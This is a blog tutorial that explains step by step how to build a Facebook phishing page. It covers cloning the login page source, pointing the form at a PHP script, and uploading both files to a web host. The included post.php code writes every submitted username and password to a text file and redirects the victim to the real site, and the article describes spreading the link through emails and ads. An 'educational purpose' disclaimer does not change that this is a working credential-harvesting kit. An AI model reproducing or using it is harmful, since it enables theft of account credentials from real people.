in

How to Create a Phishing Page

Phishing is an old and very effective technique used by Hackers to obtain sensitive information such as usernames, passwords, and credit card details (and money), often for malicious reasons, by disguising as a trustworthy entity in an electronic communication.

Here in this article, You will learn How to create a Phishing page like Facebook, LinkedIn, Twitter or Gmail etc.

Note: This article “How to Create a Phishing Page” is an educational purpose and Non of us are responsible for any illegal activity. Phishing is mostly used by Cyber Criminals but Learning about Phishing can help you to protect from phishing attacks or being a victim of any Hackers.

STEPS TO CREATE A PHISHING PAGE:

The process of creating a basic phishing page is so simple and any user can make it without any technical knowledge but It may complicated for Advanced phishing page because it requires some technical knowledge. So let’s start to create a phishing page.

Remember: We are creating here Facebook Phishing page but If you want to create other phishing page like Gmail, Twitter or LinkedIn etc then don’t worry because the Process is same for all.

Step 1: Go to the Facebook official website (If you want to create other phishing page like Gmail, Twitter or other then visit their official website).

Note: Don’t login or sign in to the website.

After that right click on the website’s login page then click on “view source page” to view the source code behind this page.

view source page

Step 2: Copy complete source code into Notepad or any Text Editor.

Note: I am using here Notepad Which is Windows default text editor.

After that search for “action” keyword and To do that Press CTRL+F together in WordPad or your chosen Text editor.

Facebook action

You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1″

Note: You may find many “action” keyword during search and It may be confusing to you but When It happens to you then simply search for “login.php

Facebook login

Step 3: Delete everything contained in the quotations and fill the quotes with “post.php“.

Now it should read action=”post.php”.

Facebook post

Step 4: Save this file somewhere on your computer with the file name of “index.htm“.

Note: Omit the final period from the filename. This is going to become your phishing page.

Facebook Index

Step 5: Next, Create a new notepad document with the name of “post.php“.

Note: Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Facebook Post Code

At this point, you should now have two files saved: “index.htm” and “post.php“.

Two files

Step 6: Next, This code actually needs to be uploaded to a web hosting service like Bluehost, Hostgator etc.

There are many free web hosting providers but I wouldn’t recommend them because they are now spam.

Note: I am using here Bluehost web hosting to upload the Phishing files.

After you have Signed Up or Signed In for an account, browse to the control panel, and then to file manager.

Bluehost file manager

Once the window opens, go to “public_html“.

Public

Delete “default.php“, and then upload “index.htm” and “post.php“.

Upload files

Next, click on a preview of “index.htm“. As you’ll notice, it should look nearly identical to the Facebook login page.

Facebook Phishing Demo

The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.

Now go back to the file manager and “public_html“. There should be a file labeled “username.txt“.

Note: This “username.txt” file will be created automatically when someone enter any details in your created phishing page.

username

Open this file and you should be able to see login credentials that have been entered by a test user.

Final Thoughts:

It is really a simple matter of copying the code from the Facebook login screen, adding some php code, and then setting up a dummy website.

Again, don’t try this in the real world, because the consequences could be terrible.

However, in a home environment on your own web server, this tutorial provides great insight into how attackers phish for usernames and passwords.

I Hope you like this tutorial “How to Create a Phishing Page”, Do comments, If you have any further queries and also d share this article with your friends on social media like Facebook, LinkedIn, Twitter or Other.

What do you think?

223694 points
Upvote Downvote

Total votes: 0

Upvotes: 0

Upvotes percentage: 0.000000%

Downvotes: 0

Downvotes percentage: 0.000000%

Written by Tharun Jarugula

I'm a Professional Blogger and Web Designer.

Leave a Reply

Your email address will not be published. Required fields are marked *

How to Run Android Apps On PC Using Bluestacks

How To Hide Hard Drive Partition in Windows Using Command Prompt